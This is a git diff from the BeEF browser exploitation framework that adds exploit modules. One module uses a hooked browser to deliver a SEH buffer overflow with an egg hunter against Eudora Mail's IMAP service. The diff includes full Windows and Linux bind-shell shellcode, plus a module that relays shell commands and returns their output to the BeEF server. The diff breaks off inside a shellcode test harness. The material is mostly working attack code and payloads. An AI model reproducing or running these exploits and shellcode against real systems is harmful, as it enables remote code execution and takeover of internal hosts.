diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
index ba7f8e63e..ee3559091 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Axous_add_user_csrf < BeEF::Core::Command
 
diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
new file mode 100755
index 000000000..afd6b8256
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -0,0 +1,91 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function () {
+    var rhost = '<%= @rhost %>';
+    var rport = '<%= @rport %>';
+    var path = '<%= @path %>';
+    var cmd = '<%= @cmd %>';
+    var shellcode ='<%= @shellcode %>';
+
+    var uri = "http://" + rhost + ":" + rport + path;
+
+    strip_output = function(output){
+
+        var offset = 0;
+        for(var c in output){
+            c = output.charAt(c);
+            if(c.charCodeAt(0) == 0){
+                break;
+            }
+            offset++;
+        }
+        return output.substring(0,offset);
+    };
+
+    var counter = 0;
+    get_additional_cmd_results = function(){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                var result = strip_output(xhr.responseText);
+                beef.debug("result.length: " + result.length);
+                if(result.length != 0){
+                    beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
+                        counter++;
+                        setTimeout("get_additional_cmd_results()",500);
+                        }
+             }else{ // No more command results, ready to send another command.
+                beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    get_prompt = function () {
+
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                beef.debug("get_prompt: Retrieved prompt");
+                var prompt = strip_output(xhr.responseText);
+                beef.debug(prompt);
+                beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
+
+                //send command
+                send_command(cmd);
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    send_command = function(command){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            var cmd_result = strip_output(xhr.responseText);
+            beef.debug(cmd_result);
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
+        };
+        xhr.open("POST", uri, false);
+        xhr.setRequestHeader("Content-Type", "text/plain");
+	if (shellcode == 'Linux'){
+            command = "cmd=" + command + "\n"; // very important only LF
+        }else{
+            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        }
+        xhr.send(command);
+        setTimeout("get_additional_cmd_results()",500);
+    };
+
+
+
+get_prompt();
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
new file mode 100755
index 000000000..e7de6238a
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        BeEF_bind_shell:
+            enable: true
+            category: ["Exploits", "BeEF_bind"]
+            name: "BeEF bind shell"
+            description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back."
+            authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
+            target:
+                working: ["FF", "C", "S"]
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
new file mode 100755
index 000000000..dc84c3c03
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -0,0 +1,25 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beef_bind_shell < BeEF::Core::Command
+
+	def self.options
+		return [
+      { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+      { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+      { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
+      { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
+          'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
+          'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
+        }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
new file mode 100755
index 000000000..22702db22
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -0,0 +1,388 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function () {
+    var rhost = '<%= @rhost %>';
+    var rport = '<%= @rport %>';
+    var service_port = '<%= @service_port %>';
+    var path = '<%= @path %>';
+    var delay = parseInt('<%= @delay %>');
+
+    var beef_host = '<%= @beef_host %>';
+    var beef_port = '<%= @beef_port %>';
+    var beef_proto = beef.net.httpproto;
+    var beef_junk_port = '<%= @beef_junk_port %>';
+    var sock_name = '<%= @beef_junk_socket %>';
+
+    //todo: this will be obviously dynamic as soon as we'll have more IPEC exploits.
+    var available_space = 769;
+
+    // base64 decode function that works properly with binary data (like shellcode)
+    var Base64Binary = {
+        _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+        decode:function (input) {
+            //get last chars to see if are valid
+            var lkey1 = this._keyStr.indexOf(input.charAt(input.length - 1));
+            var lkey2 = this._keyStr.indexOf(input.charAt(input.length - 1));
+
+            var bytes = Math.ceil((3 * input.length) / 4.0);
+            /**
+             if (lkey1 == 64) bytes--; //padding chars, so skip
+             if (lkey2 == 64) bytes--; //padding chars, so skip
+             **/
+
+            var uarray = [];
+            var chr1, chr2, chr3;
+            var enc1, enc2, enc3, enc4;
+            var i = 0;
+            var j = 0;
+
+            input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
+
+            for (i = 0; i < bytes; i += 3) {
+                //get the 3 octects in 4 ascii chars
+                enc1 = this._keyStr.indexOf(input.charAt(j++));
+                enc2 = this._keyStr.indexOf(input.charAt(j++));
+                enc3 = this._keyStr.indexOf(input.charAt(j++));
+                enc4 = this._keyStr.indexOf(input.charAt(j++));
+
+                chr1 = (enc1 << 2) | (enc2 >> 4);
+                chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+                chr3 = ((enc3 & 3) << 6) | enc4;
+
+                uarray.push(chr1 & 0xff);
+                if (enc3 != 64) uarray.push(chr2 & 0xff);
+                if (enc4 != 64) uarray.push(chr3 & 0xff);
+            }
+            return uarray;
+        }
+    };
+
+
+    /*
+     * Ty's goodness. Slightly modified BeEF bind stager to work with the
+     * Egg Hunter.
+     *
+     * Original size: 299 bytes
+     * Final size: 326 bytes
+     * BadChars removed: \x00\x0a\x0d\x20\x7b
+     */
+    var stager = "B33FB33F" + 
+        "\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" +
+        "\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" +
+        "\x10\xac\x5f\x96\xe1\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" +
+        "\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" +
+        "\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" +
+        "\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" +
+        "\xe9\x0b\x68\xa9\x9e\xa1\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" +
+        "\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4f\x03\x5d\x6f" +
+        "\xaf\xc8\x60\x5f\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" +
+        "\x26\xe0\xbe\xf5\xba\x42\x34\xad\x1e\x72\x99\x28\xd5\x78" +
+        "\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1c\x28\xb0\x30" +
+        "\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" +
+        "\xae\x72\xd9\x24\x03\x49\xe1\xb4\x0b\xda\x92\x86\x94\x70" +
+        "\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" +
+        "\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" +
+        "\x64\x31\x23\xcd\x6e\xbe\x1c\xed\x91\x14\x35\xdf\xb6\xc4" +
+        "\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" +
+        "\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" +
+        "\x6b\x3c\xa5\x6e\x60\xf9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" +
+        "\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" +
+        "\x13\x86\x50\x8a\x47\xb3\x9f\x07\xee\xfd\x35\xa8\xa2\x51" +
+        "\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" +
+        "\xf3\x4d\x47\x15\x6f\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" +
+        "\x37\x96\x26\x84";
+
+    /*
+     * Ty's goodness. Original BeEF bind stage.
+     *
+     * Original size: 792 bytes
+     */
+    var stage_allow_origin =
+        "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" +
+            "\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52" +
+            "\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
+            "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38" +
+            "\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58" +
+            "\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a" +
+            "\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5" +
+            "\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89" +
+            "\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf" +
+            "\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00" +
+            "\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00" +
+            "\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68" +
+            "\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
+            "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
+            "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79" +
+            "\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d" +
+            "\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20" +
+            "\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f" +
+            "\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c" +
+            "\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
+            "\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3" +
+            "\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90" +
+            "\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" +
+            "\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
+            "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff" +
+            "\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00" +
+            "\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
+            "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3" +
+            "\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00" +
+            "\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00" +
+            "\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b" +
+            "\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00" +
+            "\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c" +
+            "\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04" +
+            "\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38" +
+            "\xfe\xff\xff";
+
+    // Skape's NtDisplayString egghunter technique, 32 bytes -> see also string T00W inside
+    /*
+     * Egg Hunter (Skape's NtDisplayString technique).
+     * Original size: 32 bytes
+     *
+     * Next SEH and SEH pointers
+     * Size: 8 bytes
+     */
+    var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +
+                     "\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
+    var next_seh   = "\xeb\x06\x90\x90";
+    var seh        = "\x4e\x3b\x01\x10";
+
+
+    gen_nops = function(count){
+        var i = 0;
+        var result = "";
+        while(i < count ){ result += "\x90";i++;}
+        log("gen_nops: generated " + result.length + " nops.");
+        return result;
+    };
+
+    /*
+     * send_stager_back():
+     * In order to properly calculate the exact size of the cross-domain request headers,
+     * we send a bogus request back to BeEF (different port, so still cross-domain).
+     *
+     * get_junk_size():
+     * Then we retrieve the total size of the HTTP headers, as well as other specific headers like 'Host'
+     *
+     * calc_junk_size():
+     * Calculate the differences with the request that will be sent to the target, for example:
+     * "Host: 172.16.67.1:2000\r\n"    //24 bytes
+     * "Host: 172.16.67.135:143\r\n"   //25 bytes
+     */
+    send_stager_back = function(){
+        var uri = "http://" + beef_host + ":" + beef_junk_port + "/";
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", uri, true);
+        xhr.setRequestHeader("Content-Type", "text/plain");
+        xhr.setRequestHeader('Accept','*/*');
+        xhr.setRequestHeader("Accept-Language", "en");
+        xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+        log("send_stager_back: sending back the stager to calculate headers size");
+    };
+
+    var timeout_counter = 0;
+    var timeout = 10;
+    var size,host,contenttype,referer,nops = null;
+    get_junk_size = function(){
+        var junk_name = "";
+        var uri = beef_proto + "://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
+
+        $j.ajax({
+            type: "GET",
+            url: uri,
+            dataType: "json",
+            success: function(data, textStatus, xhr){
+                size = data.size;
+                host = data.host;
+                contenttype = data.contenttype;
+                referer = data.referer;
+
+                //todo to it better
+                nops = data.nops;
+
+                log("get_junk_size: OK - size [" + size + "] - host [" +
+                    host + "] - contenttype [" + contenttype + "] - referer [" + referer + "]");
+            },
+            error: function(jqXHR, textStatus, errorThrown){
+                timeout_counter++;
+                // re-tries for 10 times (10 seconds)
+                if (timeout_counter < timeout) {
+                    log("get_junk_size: ERROR - no data yet. re-trying.");
+                    setTimeout(function() {get_junk_size()},1000);
+                }else{
+                    log("get_junk_size: ERROR - timeout reached. giving up.");
+                }
+            }
+        });
+
+    };
+
+    var final_junk_size = null;
+    calc_junk_size = function(){
+
+        final_junk_size = size;
+        // 8 -> Host: \r\n
+        var new_host = (rhost+":"+service_port).length + 8;
+        if(new_host != host){
+
+            if(new_host > host){
+                var diff = new_host - host;
+                final_junk_size += diff;
+            }else{
+                var diff = host - new_host;
+                final_junk_size -= diff;
+            }
+        }
+        log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+
+        //content-type "; charset=UTF-8" will not be present at the end, in the new request - we save 15 bytes
+        if(contenttype > 26)
+            final_junk_size -= 15;
+
+        // referrer should be the same
+        // we can also override the UserAgent (deliovering the Firefox Extension). We can then save 90 bytes or more.
+        log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+    };
+
+    var stager_successfull = false;
+    send_stager = function(){
+
+        try{
+            xhr = new XMLHttpRequest();
+            var uri = "http://" + rhost + ":" + service_port + path;
+            log("send_stager: URI " + uri);
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+
+            //todo: if for some reasons the headers are too big (bigger than 425 bytes),
+            // a warning should be displayed, because the exploit will not work, given the
+            // space for the shellcode that we have.
+            // The likelihood of this can be minimized thanks to the Firefox Extension we deliver
+            // to disable PortBanning. We are also overriding the UserAgent, so we save up to 100 bytes of space.
+
+            var junk = available_space - stager.length - final_junk_size; // 22 bytes
+            var junk_data = gen_nops(junk);
+
+            var payload = junk_data + stager + next_seh + seh + egg_hunter;
+            var decoded_payload = Base64Binary.decode(btoa(payload));
+
+            var c = "";
+            for (var i = 0; i < decoded_payload.length; i++) {
+                c += String.fromCharCode(decoded_payload[i] & 0xff);
+            }
+
+            //needed to have the service replying before sending the actual exploit
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+            xhr.setRequestHeader('Accept','*/*');
+            xhr.setRequestHeader("Accept-Language", "en");
+            xhr.send("a001 LIST \r\n");
+            // / needed to have the service replying before sending the actual exploit
+
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+            xhr.setRequestHeader('Accept','*/*');
+            xhr.setRequestHeader("Accept-Language", "en");
+
+            var post_body = "a001 LIST " + "}" + c + "}" + "\r\n";
+
+            log("send_stager: Final body length [" + post_body.length + "]");
+
+            // this is required only with WebKit browsers.
+            if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+                    function byteValue(x) {
+                        return x.charCodeAt(0) & 0xff;
+                    }
+                    var ords = Array.prototype.map.call(datastr, byteValue);
+                    var ui8a = new Uint8Array(ords);
+                    this.send(ui8a.buffer);
+                }
+            }
+
+            xhr.sendAsBinary(post_body);
+            log("send_stager: stager sent.");
+            stager_successfull = true;
+        }catch(exception){
+            beef.debug("!!! Exception: " + exception);
+            // Check for PortBanning exceptions:
+            //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
+            if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
+                // not exactly needed but just in case
+                stager_successfull =  false;
+                log("Error: NS_ERROR_PORT_ACCESS_NOT_ALLOWED. Looks like PortBanning for port [" + service_port + "] is still enabled!");
+            }
+        }
+
+    };
+
+    deploy_stage = function () {
+        if(stager_successfull){
+            // As soon as the stage is running, the HTTP responses will contain Access-Control-Allow-Origin: *
+            // so we can communicate with CORS normally.
+            var decoded_shellcode = Base64Binary.decode(btoa(stage_allow_origin));
+            var c = "";
+            for (var i = 0; i < decoded_shellcode.length; i++) {
+                c += String.fromCharCode(decoded_shellcode[i] & 0xff);
+            }
+            var post_body = "cmd=" + c;
+            var uri = "http://" + rhost + ":" + rport + path;
+
+            xhr = new XMLHttpRequest();
+            beef.debug("uri: " + uri);
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+
+            // this is required only with WebKit browsers.
+            if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+                    function byteValue(x) {
+                        return x.charCodeAt(0) & 0xff;
+                    }
+                    var ords = Array.prototype.map.call(datastr, byteValue);
+                    var ui8a = new Uint8Array(ords);
+                    this.send(ui8a.buffer);
+                }
+            }
+
+            xhr.sendAsBinary(post_body);
+            log("deploy_stage: stage sent.\r\n You should be now able to use beef_bind_shell module to send commands.");
+        }else{
+            log("Skipping Stage delivery because Stager failed.");
+        }
+
+    };
+
+    log = function(data){
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
+        beef.debug(data);
+    };
+
+
+/*
+* To calculate exact HTTP header size we send a request back to BeEF, on a different socket, to maintain
+* the cross-domain behavior.
+*/
+send_stager_back();
+
+/*
+* Deliver Stager and Stage.
+*
+* The following timeouts should be enough with normal DSL lines.
+* Increase delay value for slower clients.
+*/
+setTimeout("get_junk_size()", delay/2);
+setTimeout("calc_junk_size()", delay);
+setTimeout("send_stager()", 2000 + delay);
+setTimeout("deploy_stage()", 6000 + delay);
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
new file mode 100755
index 000000000..02b3c6e20
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        BeEF_bind_staged_deploy:
+            enable: true
+            category: ["Exploits", "BeEF_bind"]
+            name: "BeEF bind"
+            description: "Pwn internal services with a custom staging shellcode. Both the stager and the stage are delivered.
Right now only Eudora Mail 3 (v. v6.1.19.0) on Windows (POP ECX mailcmn.dll) can be exploited: SEH exploit with EggHunter. 
 More exploits to come soon."
+            authors: ["antisnatchor", "tymiller"]  # shellcode awesomeness  -> Ty Miller
+            target:
+                working: ["FF"]
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
new file mode 100755
index 000000000..bd3a9aacd
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beef_bind_staged_deploy < BeEF::Core::Command
+
+	def self.options
+    configuration = BeEF::Core::Configuration.instance
+    beef_host = "#{configuration.get("beef.http.host")}"
+    beef_port = "#{configuration.get("beef.http.port")}"
+
+		return [
+      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
+      { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'},
+      { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+      { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+      { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'},
+      { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host},
+      { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port},
+      { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'},
+      { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'}
+    ]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
new file mode 100755
index 000000000..58fee2877
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -fno-stack-protector -z execstack -o socket64 socket64.c
+**/
+
+#include 
+#include 
+#include 
+#include 
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
+
+int main(int argc, char **argv) {
